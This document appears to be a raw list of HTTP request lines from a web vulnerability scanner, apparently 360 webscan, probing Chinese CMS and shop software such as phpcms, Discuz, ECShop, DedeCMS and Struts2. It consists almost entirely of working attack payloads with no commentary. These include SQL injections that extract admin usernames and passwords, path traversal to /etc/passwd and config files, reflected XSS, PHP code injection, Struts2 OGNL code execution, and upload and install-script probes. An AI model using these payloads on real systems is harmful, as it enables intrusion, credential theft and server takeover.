GET /index.php?a=list_type&c=index&m=link&siteid='+and(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,unhex(Hex(cast(v9_admin.username+as+char))),0x27,0x7e)+from+%60phpcmsv9%60.v9_admin+Order+by+userid+limit+0,1)+)+from+%60information_schema%60.tables+limit+0,1),floor(rand(0)*2))x+from+%60information_schema%60.tables+group+by+x)a)+and+'1'%3D'1
GET /index.php?ac=search&at=taglist&tagkey=%2527,tags)%20or(select%201%20from(select%20count(*),concat((select%20(select%20concat(0x7e,0x27,table_name,0x27,0x7e))%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
GET /?/home/explore/category-1)%20AND%20(SELECT%204037%20FROM(SELECT%20COUNT(*),CONCAT(CHAR(58,100,114,108,58),(SELECT%20(CASE%20WHEN%20(4037=4037)%20THEN%201%20ELSE%200%20END)),CHAR(58,122,103,111,58),FLOOR(RAND(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a)%20AND%20(9909=9909
GET /category/1)%20AND%20(SELECT%204037%20FROM(SELECT%20COUNT(*),CONCAT(CHAR(58,100,114,108,58),(SELECT%20(CASE%20WHEN%20(4037=4037)%20THEN%201%20ELSE%200%20END)),CHAR(58,122,103,111,58),FLOOR(RAND(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a)%20AND%20(9909=9909
POST /upload/flow.php?step=update_cart
GET /user.php?act=is_registered&username=%CE%27360webscan%23
GET /do/api/uc.php?code=0bafU3yf6F7GsKqf3iZb1mSEZGreWpWlgHPE7DZRfkxE%2BOKOacQgl4JLy%2FS389F7qVCajFQ0xuDo1y6UUvt3NoR85dpBZd%2BdSNT7PaI
GET /do/api/uc.php?code=3313Q1ueQOU%2B1vFFJiosRu1wjJh0TPNrnivmg700mcfy4aJR3QChRsLmasXzCBnypE%2BZ8Oj9hPTpwoVCmRCIcG4lFbZfMhTlmKdb7Sc
GET /zhuti/360webscan'
GET /js.php?sort=1&jssort=shop&where=%201=2%20/**/union/**/select/**/1,adminname,password,4,5/**/from/**/modoer_admin%23
GET /js.php?jssort=shop&sort=1&num=2&panels=a'+and/**/1=2/**/union%20select+1,sha1('360webscan'),3,4,5%23
GET /search.php?query=a';?%3E%3C?exit(sha1('360webscan'));?%3E&modelid=1%20or%202=2
GET /WEB-INF/web.xml
GET /api.php?action=File&ctrl=download&path=api.php
GET /?/people/360webscan?notification_id-360webscan'
GET /?tag=test'%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(sha1('360webscan'),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%20AND%20'1'='1
POST /fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=FileUpload&Type=File&CurrentFolder=%2F
GET /down/class/index.php?myord=0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(sha1(0x3336307765627363616e),(SELECT%20(CASE%20WHEN%20(8274=8274)%20THEN%201%20ELSE%200%20END)),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
GET /admin/manageAPP.php
GET /index.php?m=poster&c=index&a=poster_click&id=1
GET /yp/web/index.php?userid=999999999999999999999999999999999999&menu=die(md5($_GET%5bscan%5d))%3b&scan=webscan
GET /?/search/ajax/search_result/search_type-all__q-360webscan'
GET /?/people/ajax/user_actions/uid-1__actions-1)%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(sha1(0x3336307765627363616e),(SELECT%20(CASE%20WHEN%20(8274=8274)%20THEN%201%20ELSE%200%20END)),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%20and%20(1=1
GET /index.php?option=com_ztautolink&controller=../../../../../../../../../../../../../../../etc/passwd%00
GET /api/datacall.php?type=user&by=360webscan&order=/**/&limit=1
GET /wcm/infoview.do?serviceid=wcm6_user&MethodName=getUsersByNames&UserNames=admin
POST /do/s_rpc.php
POST /new2/s_rpc.php
POST /video/s_rpc.php
POST /photo/s_rpc.php
POST /news/s_rpc.php
GET /plus/search.php?typeArr[2%27%20and%20@%60%5C%27%60%3D0and%20and%20%28SELECT%201%20FROM%20%28select%20count%28%2a%29%2Cconcat%28floor%28rand%280%29%2a2%29%2C%28substring%28%28Select%20md5%280x7765627363616e%29%29%2C1%2C62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=c4&kwtype=0&q=c4rp3nt3r&searchtype=title
GET /page/html/?360webscan'.html
GET /Admin/sqlPlatform/operateSql.aspx
GET /respond.php?code=alipay&subject=0&out_trade_no=%00'order%20by%20010101010webscan%20--%20(
GET /connect.php?receive=yes&mod=login&op=callback&referer=webscan%5Cu0027.replace(/.%2b/,/javascript:alert(42873)/.source);//
GET /connect.php?receive=yes&mod=login&op=callback&referer=webscan%bf%5Cu0027.replace(/.%2b/,/javascript:alert(42873)/.source);//
GET /php-ofc-library/ofc_upload_image.php?name=ed1e83f8d8d90aa943e4add2ce6a4cbf.txt
GET /member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes&inajax=1&username=360webscan&password=ooxx&quickforward=yes&handlekey=webscan360
GET /e/data/ecmseditor/infoeditor/epage/TranMedia.php?InstanceName=3232%22%3E%3Cscript%3Ealert(/D/)%3C/script%3E%3C%22
GET /e/data/ecmseditor/infoeditor/epage/TranImg.php?InstanceName=3232%22%3E%3Cscript%3Ealert(/D/)%3C/script%3E%3C%22
GET /e/data/ecmseditor/infoeditor/epage/TranFlash.php?InstanceName=3232%22%3E%3Cscript%3Ealert(/D/)%3C/script%3E%3C%22
GET /e/data/ecmseditor/infoeditor/epage/TranFile.php?InstanceName=3232%22%3E%3Cscript%3Ealert(/D/)%3C/script%3E%3C%22
GET /pf/ratemovie.php?id=1%20and%201=2%20UNION%20ALL%20SELECT%20NULL,sha1(0x3336307765627363616e)
GET /pf/rate.php?id=1%20and%201=2%20UNION%20ALL%20SELECT%20NULL,sha1(0x3336307765627363616e)
GET /plus/pf/rate.php?id=111%3D@%60%5C'%60+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+sha1(0x3336307765627363616e)),1,62)))a+from+information_schema.tables+group+by+a)b)%23@%60%5C'%60+]=a
GET /index.php?ac=search&at=taglist&tagkey=a%2527
GET /wap/index.php?ac=search&at=taglist&tagkey=a%2527
POST /ckeditor/samples/sample_posteddata.php
GET /plus/carbuyaction.php?dopost=return&code=../../tags
POST /?cart-ajaxadd
GET /do/kindeditor.php?id=%bf%22;alert(1);//&style=&etype=
GET /index.php?ac=order&at=list
GET /ajax.php?act=verify_ecv&ecvsn=360scan&ecvpassword=webscan%27
GET /ajax.php?act=verify_ecv&ecvsn=360scan%27
GET /include/online.php?jsoncallback=%3Ciframe/onload=alert(/webscan/)%3E
POST /m.php?m=User&a=doLogin
GET /api.php?act=1&appname=../../core/html/pages/about.html%00
GET /ajax.php?act=check_field&field_name=user_name&field_data=webscan%27
GET /message.php?act=webscan'
GET /link.php?act=go&url=webscan.cn'
GET /showtopiclist.aspx?direct=0%22/%3E%3Cscript%3Ealert(42873)%3C/script%3E&forumid=-1&order=1&page=1&search=1&type=
GET /showtopiclist.aspx?direct=0&forumid=-1&order=1%22/%3E%3Cscript%3Ealert(42873)%3C/script%3E&page=1&search=1&type=
GET /include/dialog/config.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
GET /include/dialog/select_templets_post.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
GET /include/dialog/select_templets.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
GET /include/dialog/select_soft_post.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
GET /include/dialog/select_soft.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
GET /include/dialog/select_media_post.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
GET /include/dialog/select_media.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
GET /include/dialog/select_images.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
GET /include/dialog/select_images_post.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
GET /plus/bshare.php?dopost=getcode&uuid=%22%20onload=alert%281%29//
GET /group/search.php?keyword=1%3Ciframe%20src=data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4K%3E
GET /admin_aspcms/_content/_tag/aspcms_tag.asp
GET /admin_aspcms/index.asp
POST /admin_aspcms/_style/aspcms_stylefun.asp?action=edit
GET /do/count.php?fid=1'%3E%22)%3C/script%3E%3Cscript%3Ealert(String.fromCharCode(120,%20115,%20115))%3C/script%3E
GET /index.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')]
GET /login.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')]
GET /member.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')]
GET /Login.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')]
GET /Index.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')]
GET /resin-doc/viewfile/?file=index.jsp
POST /portal.php?diy=yes%22%3E%3C/ScRiPt%3E%3CScRiPt%3Ealert(/webscan/)%3C/ScRiPt%3E
POST /includes/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php
POST /api/uc_client/control/mail.php
GET /api.php?op=video_api&pc_hash=1&uid=1&snid=%3C/script%3E%3Cscript%3Ealert(/42873/)%3C/script%3E//&do_complete=1%20
GET /api.php?op=map&maptype=1&defaultcity=%E5%8C%97%E4%BA%AC&field=%29%3C/script%3E%3Cscript%3Ealert%2842873%29%3C/script%3E//
GET /api.php?op=map&maptype=1&defaultcity=%e5%22;alert%28/42873/%29;//
GET /api.php?op=map&maptype=1&defaultcity=%E5%8C%97%E4%BA%AC&api_key=%22%3E%3C/script%3E%3Cscript%3Ealert%28/42873/%29;%3C/script%3E
GET /api.php?op=map&maptype=1&city=test%3Cscript%3Ealert%28/42873/%29%3C/script%3E
GET /api.php?op=video_api&uid=1&snid=1&pc_hash=%3C/script%3E%3Cscript%3Ealert(/360/)%3C/script%3E//&do_complete=1
POST /index.php?act=ajax&do=datacall&in_ajax=1&m=index&op=get_datacall
GET /jiaoyou.php?pid=1'%20or%20@%60'%60%20and(select%201%20from(select%20count(*),concat((select%20(select%20concat(0x7e,0x27,sha1(0x3336307765627363616e),0x27,0x7e))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20or%20@%60'%60%20and%20'1'='1
GET /index.php/product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(0x7c,admin_name,0x7c,admin_pw,0x7c,sha1(0x3336307765627363616e))+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19%20and+'1'='1
POST /subscribe.php?act=dounsubscribe
POST /productbuy/checkout.asp?11_22.html
GET /data/%23data.asp
POST /manage/Config/BackupRestore.aspx
GET /install/index.php.bak?insLockfile=1
GET /plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=35
POST /?cart-addGoodsToCart.html
POST /install/index.php?step=active
GET /index.php?controller=block&action=spec_value_list&id=1%20union%20select%201,%28Select%20concat%280x5b,admin_name,0x3a,PassWord,0x5d%29%29,3,4,5,6%20from%20iwebshop_admin
GET /install/index.php?step=1&insLockfile=1
GET /plus/ajax_officebuilding.php?act=key&key=%E9%8C%A6%27%20a%3C%3End%201=2%20un%3C%3Eion%20sel%3C%3Eect%201,2,3,md5(1122),5,6,7,8,9%23
GET /plus/ajax_common.php?act=hotword&query=%E9%8C%A6%27%20a%3C%3End%201=2%20un%3C%3Eion%20sel%3C%3Eect%201,md5(1122),3%20fr%3C%3Eom%20qs_admin%23
GET /plus/ad_js.php?aid=1&nocache=1
POST /admin.php
GET /resume/?key=xxxx%bf%22;alert(360);//
POST /register.php?do=check
GET /about/?module=../robots.txt&fmodule=7
GET /plus/Promotion.asp
GET /besthr/index.php?type=1%20and%20@%60%5C'%60%20or%20ascii(substring((select%20a_user%20from%20job_admin),1,1))=97%20%23@%60%5C'%60
GET /index.php?controller=site&action=getProduct&specJSON=%7B%20%22people%22:%221'%20and%201=2%20union%20select%20md5(1122),2,3,4,5,6,7,8,9%20and%20'1'='1%22%7D
GET /admin/admin_audit.php?status=1%27%29;phpinfo%28%29;//
POST /index.php?m=announcement&s=admin/notice
GET /item/?c-5,key-1'.html
GET /admin/fileopen.asp?filename=../index.asp
GET /cache/bak_mysql.txt
GET /index.php?case=archive&act=search&keyword=webscan%25%2527%29%09union%09select%090%2C0%2C0%2Cconcat%28username%2Cpassword%29%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%09from%09cmseasy_user%09where%09groupid%3D2%09union%09SELECT%09*%09FROM%09%60cmseasy_archive%60%09WHERE%09%28title%09like%09%2527%25aaaaaaaa
GET /api.php?act=../../robots.txt%00:template_info&api_version=1.0&app=12
GET /product-xxx-%3Cscript%20language=%22php%22%3Eecho%20%22webscan%22;-_set_compile.html
GET /user.php?back_act=http://127.0.0.1%22style=x:expression(alert(42873))%3E
POST /article_cat.php?id=12
POST /passport-verify.html
GET /user/userzone/School/download.aspx?f=/config/ConnectionStrings.config
GET /ajax.php?action=letter&letter=a&moduleid=1//***/union//***/select//***/1,2,concat(username,0x7c,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23//***/from//***/destoon_member//***/where//***/groupid=1//***/limit//***/0,1%23
GET /statistics.php?referer=http://www.google.com/search?q=a%2527),(null,null,null,null,null,null,null,null,(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select(select%20concat(user_name,0x7c,password)%20from%20nitc_user%20limit%200,1)),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b))%23&b=c&pageurl=1
POST /inquiry.php?action=inquiry
GET /install/index.php?_m=frontpage&_a=check
POST /api.php?act=get_spec_single&api_version=3.1
GET /index.php?m=video&c=video_for_ck&a=add_f_ckeditor&vid=1&title=a%E9%8C%A6%27,0,0,0,0,0,%28select%20%281%29%20from%20mysql.user%20where%201=1%20aNd%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%29%29%23
POST /api.php?act=get_product_detail_info&api_version=3.1
POST /api.php?act=get_products_list&api_version=3.1
POST /?tools-products.html
POST /index.php?case=admin&act=login&admin_dir=admin&site=default
GET /index.php?case=user&act=space&mid=1
GET /?mod=wap&code=coupon_input&msgcode=ops-success&last[]==1%20union%20/*!select*/%201,1,1,1,1,1,1,1234567890,1%20from%20cenwor_system_members
GET /ajax.php?mod=check&code=email&email=a%2527%2bor%2b%28role_id%3D2%2band%2bascii%28substring%28%252756789%2527%2bfrom%2b2%29%29%3D54%29%2bor%2b%25272%2527%3D%25271&submit=
GET /index.php?m=company&s=space_comments&uid=1and%20(SELECT%201%20from%20(selectcount(*),concat(floor(rand(0)*2),(substring((select(selEctconcat(user,0x7c,password)%20from%20b2bbuilder_admin%20limit%200,1)),1,62)))a%20frominformation_schema.tables%20group%20by%20a)b)
GET /index.php?m=Order&a=index
GET /index.php?app=widget&mod=Category&act=getChild&model_name=Schedule&method=runSchedule&id[task_to_run]=addons/Area)-%3EgetAreaList();print(md5(1122));%23
POST /api/search.php?moduleid=5
POST /item.php?act=ajax&do=subject&op=get_membereffect
GET /include/global/showmod.php?id=9&dbname=met_admin_table%20where%20length(admin_pass)=32--%201
GET /include/hits.php?met_hits=met_download%20cross%20join%20met_admin_table%20where%20met_download.id=met_admin_table.id%20and%20length(admin_pass)=32%20--%201
GET /do/fujsarticle.php?type=like&FileName=../data/8137572f3849aabdwebscan.php&submit=check
GET /?app=vote&controller=vote&action=total&contentid=1%20and%20cast(ascii(substring(version(),1,1))=53%20as%20signed)
POST /?case=manage&act=guestadd&manage=archive&guest=1
GET /article.php?act=list&catid=0&keyword=%d5'%20and(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20distinct%20concat(0x7e,0x27,schema_name,0x27,0x7e)%20FROM%20information_schema.schemata%20LIMIT%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1%23
GET /phpsso_server/api.php?op=install&username=phpcms&password=reer&url=123&name=123&authkey=123&apifilename=123&charset=123&type=123&synlogin=123
GET /u.php/member-login?id=header_login%27%22%28%29%26%25%3CScRiPt%20%3Eprompt%2842873%29%3C/ScRiPt%3E&style=1
GET /index.php/cms/item-comment?callback=jsonp1380096883458'%22()%26%25%3Cscript%3Eprompt(42873)%3C/script%3E&iid=114&page=1&view_page=1&_=1380096883791&_ajax_request=
GET /misc.php?mod=syscode&pnumber=C%27%20or%20%60%27%60%20%20or%20@%60%27%27%60%20union%20select%201%20from%20%28select%20count%28*%29,concat%28%28select%20database%28%29%29,floor%28rand%280%29*2%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%20%23%20@%60%27%60
GET /general/reportshop/utils/ExecUserDefFormulas.php?formulas=%3C?php%20echo%20md5('webscan');exit();?%3E
GET /jcms/m_5_1/attach_dwn.jsp?filename=passwd&fpath=/etc/passwd
POST /member.php?act=login&op=forget&rand=U7183
GET /mobile/goods_list.php?type=1s'%20onmouseover=alert(/ed1e83f8d8d90aa943e4add2ce6a4cbf/)%20//
POST /bocadmin/j/uploadify.php
POST /index.php?app=main&func=common&action=upFile&act=upforhtmleditor
POST /lib/upload/upload.php
GET /jcms/setup/publishadmin.jsp
GET /jcms/workflow/sys/que_dictionary.jsp?que_keywords=1'%20and%20'1'='1%20
GET /jcms/m_5_9/downfile.jsp?filename=/etc/passwd&savename=webscan.txt
GET /index.php?app=user&ac=../../../robots.txt%00
GET /index.php?act=index&op=list&city_id=1&area_id=&mall_id=&class_id=2&class_id_1=8&pconsume=&orderby=person_consume&sort=,(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20CHAR(100,%2056,%20100,%2057,%2048,%2097,%2097,%2057,%2052,%2051,%20101,%2052,%2097,%20100,%20100,%2050)))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)
GET /index.php?app=/../robots.txt%00
POST /utility/convert/index.php
POST /utility/convert/data/config.inc.php
GET /install/svinfo.php
GET /posthistory.php?tel=IiBhbmQoc2VsZWN0IDEgZnJvbShzZWxlY3QgY291bnQoKiksY29uY2F0KChzZWxlY3QgKHNlbGVjdCAoU0VMRUNUIENIQVIoMTAwLCA1NiwgMTAwLCA1NywgNDgsIDk3LCA5NywgNTcsIDUyLCA1MSwgMTAxLCA1MiwgOTcsIDEwMCwgMTAwLCA1MCkpKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgbGltaXQgMCwxKSxmbG9vcihyYW5kKDApKjIpKXggZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIGdyb3VwIGJ5IHgpYSkj
POST /wap/index.php?mod=login&action=login
GET /wap/index.php?keywords='and((select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20CHAR(100,%2056,%20100,%2057,%2048,%2097,%2097,%2057,%2052,%2051,%20101,%2052,%2097,%20100,%20100,%2050)))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a))and'&mod=search&page=2
POST /cart.php
POST /api.php?act=set_shopex_conf&api_version=5.0
GET /report/reportServlet?action=4&url=http://127.0.0.1&file=wait_trace.raq&columns=0&srcType=file&width=-1&height=-1&cachedId=A_2&t_i_m_e=&frame=stu_saveAs_frame--%3E%3C/sCrIpT%3E%3CsCrIpT%3Ealert(42873)%3C/sCrIpT%3E
POST /user.php?act=signin
GET /CompHonorBig.asp?id=44%20and%201=12%20%20union%20select%201,'webscan',3,4,5%20from%20admin
GET /admin_aspcms/_content/_Comments/AspCms_TabAdd.asp
GET /Aboutus.asp?Title=cfreer'%20and%201=2%20union%20select%2055221122%20from%20admin
GET /ProductShow.asp?ID=98%20and%201=1%20union%20select%201,'webscan',3,4,5,55221122,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%20from%20admin
GET /DownloadShow.asp
GET /NewsClass.asp
GET /plug/collect/AspCms_CollectFun.asp?action=getlinklist&todo=this&CollectID=1%20and%20%202=iif((1=1),2,chr(97))
GET /index.php?case=tag&act=show&tag=%2522%20union%20select%200x2D3120756E696F6E2073656C65637420312C307833313239323037353645363936463645323037333635364336353633373432303331324333323243333332433644363433353238333533353332333233313331333233323239324333353243333632433337324333383243333932433331333032433331333132433331333232433331333332433331333432433331333532433331333632433331333732433331333832433331333932433332333032433332333132433332333232433332333332433332333432433332333532433332333632433332333732433332333832433332333932433333333032433333333132433333333232433333333332433333333432433333333532433333333632433333333732433333333832433333333932433334333032433334333132433334333232433334333332433334333432433334333532433334333632433334333732433334333832433334333932433335333032433335333132433335333232433335333332433335333432433335333532433335333632433335333732433335333832303636373236463644323036333644373336353631373337393546373537333635373232332C332D2D,2%23
GET /Search.asp?GetType=MainInfo&SubSys=SD&Keyword=1&s_area=1%20union%20select%20df3342ecbf86e257()
GET /temp/compiled/pages.lbi.php/%22%3C/form%3E%3CsCripT%3Ealert(42873)%3C/scRipt%3E
POST /api.php?act=search_dly_type&api_version=1.0
GET /api/uc.php?code=e58bJh4lGn7%2F87F38CD3nphwoQNenQoOElYFu9%2FBvZV2gsgxPnmRmq3iJZcx%2FF1LPelzduVe3ZFJOD4Y0vpB388niaie8ECa%2FYA%2BqA13TPGzW5EpO%2FHaShEiHdaEqgyeRf%2Bh1EBCq3UASAPet%2BTI4R8tIKfU05ENmo5bK8Fj6DHvC9%2BtIksTeaOgmBzDwHdMbbLQwjGtvauIjUNnf2FglhdFD3mQdDiOq2rSSWxWPkQEYV0Z5ihe2YhVrmUlAVJqSshZ3wh5zdfjWzCUnP4I7k3f%2B2khp64tgUEbwIdcoV38Ei47PSd5h02j9uBvIs7yg%2ByfJ7zp5ArNiq3wuDcy9LtAXup68g
GET /?m=vote&id=&vid=1,3)%20and%20%20webscan1122%23
GET /aboutus.php?type=1'and%20(select%201%20from%20(select%20count(*),concat(md5(521122),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
POST /lostpass.php?md5=3&userid=-1'%20and%20(select%201%20from%20(select%20count(*),concat(md5(55221122),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
GET /index.php?m=message&s=inquiry_basket
GET /index.php?m=message&s=inquire&userid=1)%20UnIon%20select%201,12,123%20from%20webscan%23
GET /index.php?m=announcement&s=admin/notice_manager&action=modify&id=1212%20UnIon%20select%201,2,concat(user,0x7c,password),4,5,6,7,8%20from%20webscan%23
GET /index.php?m=company&s=space_mail&tid=1)%20and%201=websec%20%23
GET /index.php?m=company&s=admin/exportexcel&ordrby=user%20and%201=websec%23
GET /index.php?m=news&s=admin/news&newsid=1%20and%20(SELECT%201%20from%20websec)
GET /notes.php?action=view&nid=1-websec
GET /?mod=account&code=Sendcheckmail&uname=-1%2527%20or%201=1%23
GET /general/workflow/list/input_form/data_fetch.php?run_id=1%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select%20md5(1122)%20from%20%60user%60%20limit%201),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23
GET /general/score/flow/scoredate/result.php?FLOW_ID=11%bf%27%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select%20md5(1122)%20from%20user%20limit%201),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23
GET /pda/auth.php?P=%60%df'and%20(select%201%20from%20%20(select%20count(*),concat((select%20md5(1122)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23&PASSWORD=test
GET /logincheck.php?UNAME=reer%df'and%20(select%201%20from%20%20(select%20count(*),concat((select%20md5(1122)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23&PASSWORD=test
GET /Search.asp
GET /suggestwordList.php?searchWord=a&language=1%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select(select%20md5(1122)%20from%20nitc_user%20limit%200,1)),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)
GET /ProductBuy.asp?UpdateOrder=%E6%9B%B4%E6%96%B0%E9%80%89%E6%8B%A9
GET /cycle_image.php?language=999%20union%20select%201,2,3,(select%20md5(1122)%20from%20nitc_user%20limit%200,1),5,file,7,8,9,0,1%20from%20nitc_ad%23%5Een
GET /download.php?tfile=%5C..%5C..%5Cconfig.php
GET /plugins/phpdisk_client/passport.php?YWN0aW9uPXBhc3Nwb3J0bG9naW4mdXNlcm5hbWU9MSZwYXNzd29yZD0xJnNpZ249NjdBMTAwNDc5QTQ4OTMyOUEzMTIxRUM0QTM2M0FBNzcmdHBmPXBkX3VzZXJzIHdoZXJlIGdpZD0xIGFuZCAoYXNjaWkoc3Vic3RyaW5nKChzZWxlY3QgdXNlcm5hbWUgZnJvbSBwZF91c2VycyB3aGVyZSBnaWQ9MSBsaW1pdCAwLDEpLDEsMSkpPTk4KSBsaW1pdCAwLDEj
POST /api.php?act=search_sub_regions&api_version=1.0
GET /index.php?c=com_index&m=yp&userid=12%22%3E%3Ciframe%20src=javascript:alert(42873)%3E
GET /index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=4%22%20onmouseover=alert(42873)%20y=&price=&rent_mode=&zone=3363
GET /index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=2000_3000%22%20onmouseover=alert(42873)%20y=&rent_mode=&zone=3363
GET /index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing%22%20onmouseover=alert(42873)%20y=&m=content&page=&pay_type_int=&price=&rent_mode=&zone=3363
GET /index.php?a=lists&agent=&bedroom=4_100%22%20onmouseover=alert(42873)%20y=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=&zone=336
GET /index.php?a=lists&agent=2%22%20onmouseover=alert(42873)%20y=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=&zone=3363
GET /index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=2%22%20onmouseover=alert(42873)%20y=&zone=3363
